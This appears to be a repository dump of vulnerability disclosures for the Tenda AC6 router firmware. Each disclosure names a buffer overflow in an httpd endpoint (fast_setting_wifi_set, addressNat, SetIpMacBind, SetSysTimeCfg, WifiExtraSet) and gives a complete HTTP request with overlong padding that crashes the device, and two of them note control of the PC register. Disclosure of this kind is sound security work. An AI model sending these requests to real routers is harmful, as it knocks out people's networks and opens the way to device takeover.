aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 47 | ``` 48 | 49 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/formSetVirtualSer/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetVirtualSer/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetVirtualSer/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetVirtualSer/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetVirtualSer/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetVirtualSer/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetVirtualSer/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetVirtualSer/images/04.png -------------------------------------------------------------------------------- /tenda_ac6/form_fast_setting_wifi_set_ssid/form_fast_setting_wifi_set_ssid.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the ssid parameter in the form_fast_setting_wifi_set function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/fast_setting_wifi_set` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/fast_setting_wifi_set` page,The details are shown below: 20 | 21 | ![image-20221119231821046](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/fast_setting_wifi_set HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 1391 31 | Accept: */* 32 | X-Requested-With: XMLHttpRequest 33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 34 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 35 | Origin: http://192.168.204.133 36 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: password=iqb1qw; bLanguage=cn 40 | Connection: close 41 | 42 | ssid=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 43 | ``` 44 | 45 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/form_fast_setting_wifi_set_ssid/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/form_fast_setting_wifi_set_ssid/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/form_fast_setting_wifi_set_ssid/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/form_fast_setting_wifi_set_ssid/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/form_fast_setting_wifi_set_ssid/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/form_fast_setting_wifi_set_ssid/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/form_fast_setting_wifi_set_timeZone/form_fast_setting_wifi_set_timeZone.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the timeZone parameter in the form_fast_setting_wifi_set function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/fast_setting_wifi_set` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/fast_setting_wifi_set` page,The details are shown below: 20 | 21 | ![image-20221119104721705](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/fast_setting_wifi_set HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 1391 31 | Accept: */* 32 | X-Requested-With: XMLHttpRequest 33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 34 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 35 | Origin: http://192.168.204.133 36 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: password=iqb1qw; bLanguage=cn 40 | Connection: close 41 | 42 | ssid=1&timeZone=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 43 | 44 | ``` 45 | 46 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/form_fast_setting_wifi_set_timeZone/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/form_fast_setting_wifi_set_timeZone/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/form_fast_setting_wifi_set_timeZone/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/form_fast_setting_wifi_set_timeZone/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/form_fast_setting_wifi_set_timeZone/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/form_fast_setting_wifi_set_timeZone/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/fromAddressNat/fromAddressNat.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the page parameter in the fromAddressNat function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/addressNat` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/addressNat` page,The details are shown below: 20 | 21 | ![image-20221119220524008](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/addressNat HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 2056 31 | Accept: */* 32 | X-Requested-With: XMLHttpRequest 33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 34 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 35 | Origin: http://192.168.204.133 36 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: password=iqb1qw; bLanguage=cn 40 | Connection: close 41 | 42 | page=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 43 | ``` 44 | 45 | ![image-20221118151225120](images/03.png) 46 | 47 | Using A*428 to padding, we can control PC register 48 | 49 | ![image-20221118163539415](images/04.png) -------------------------------------------------------------------------------- /tenda_ac6/fromAddressNat/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromAddressNat/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/fromAddressNat/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromAddressNat/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/fromAddressNat/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromAddressNat/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/fromNatStaticSetting/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromNatStaticSetting/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/fromNatStaticSetting/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromNatStaticSetting/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/fromNatStaticSetting/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromNatStaticSetting/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/fromSetIpMacBind/fromSetIpMacBind.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/SetIpMacBind` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/SetIpMacBind` page,The details are shown below: 20 | 21 | ![image-20221118155739854](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/SetIpMacBind HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 453 31 | Accept: */* 32 | X-Requested-With: XMLHttpRequest 33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 34 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 35 | Origin: http://192.168.204.133 36 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: password=iqb1qw; bLanguage=cn 40 | Connection: close 41 | 42 | bindnum=1&list=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\n 43 | ``` 44 | 45 | ![image-20221118151225120](images/03.png) 46 | 47 | Using A*428 to padding, we can control PC register 48 | 49 | ![image-20221118163539415](images/04.png) -------------------------------------------------------------------------------- /tenda_ac6/fromSetIpMacBind/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromSetIpMacBind/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/fromSetIpMacBind/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromSetIpMacBind/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/fromSetIpMacBind/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromSetIpMacBind/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/fromSetIpMacBind/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromSetIpMacBind/images/04.png -------------------------------------------------------------------------------- /tenda_ac6/fromSetSysTime/fromSetSysTime.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the fromSetSysTime function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/SetSysTimeCfg` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/SetSysTimeCfg` page,The details are shown below: 20 | 21 | ![image-20221119094833763](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/SetSysTimeCfg HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 710 31 | Accept: */* 32 | X-Requested-With: XMLHttpRequest 33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 34 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 35 | Origin: http://192.168.204.133 36 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: password=iqb1qw; bLanguage=cn 40 | Connection: close 41 | 42 | timeType=manual&time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa- 43 | 44 | ``` 45 | 46 | ![image-20221118151225120](images/03.png) 47 | -------------------------------------------------------------------------------- /tenda_ac6/fromSetSysTime/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromSetSysTime/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/fromSetSysTime/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromSetSysTime/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/fromSetSysTime/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromSetSysTime/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/fromSetWirelessRepeat/fromSetWirelessRepeat.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the wpapsk_crypto parameter in the fromSetWirelessRepeat function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/WifiExtraSet` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/WifiExtraSet` page,The details are shown below: 20 | 21 | ![image-20221119202100670](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/WifiExtraSet HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 247 31 | Accept: */* 32 | X-Requested-With: XMLHttpRequest 33 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 34 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 35 | Origin: http://192.168.204.133 36 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 37 | Accept-Encoding: gzip, deflate 38 | Accept-Language: zh-CN,zh;q=0.9 39 | Cookie: password=iqb1qw; bLanguage=cn 40 | Connection: close 41 | 42 | wifi_chkHz=1&wl_mode=wisp&wl_enbale=1&country_code=CN&wpsEn=0&guestEn=0&iptvEn=0&wifiTimerEn=1&smartSaveEn=1&dmzEn=1&handset=0&ssid=fcniux&wpapsk_key=11111111&security=wpapsk&wpapsk_type=wpa&wpapsk_crypto=aaaaaaaaaaaaaaaaaaaaaaaaaaaa&mac=undifined 43 | ``` 44 | 45 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/fromSetWirelessRepeat/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromSetWirelessRepeat/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/fromSetWirelessRepeat/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromSetWirelessRepeat/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/fromSetWirelessRepeat/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/fromSetWirelessRepeat/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/saveParentControlInfo_deviceId/images/01.png: -------------------------------------------------------------------------------- 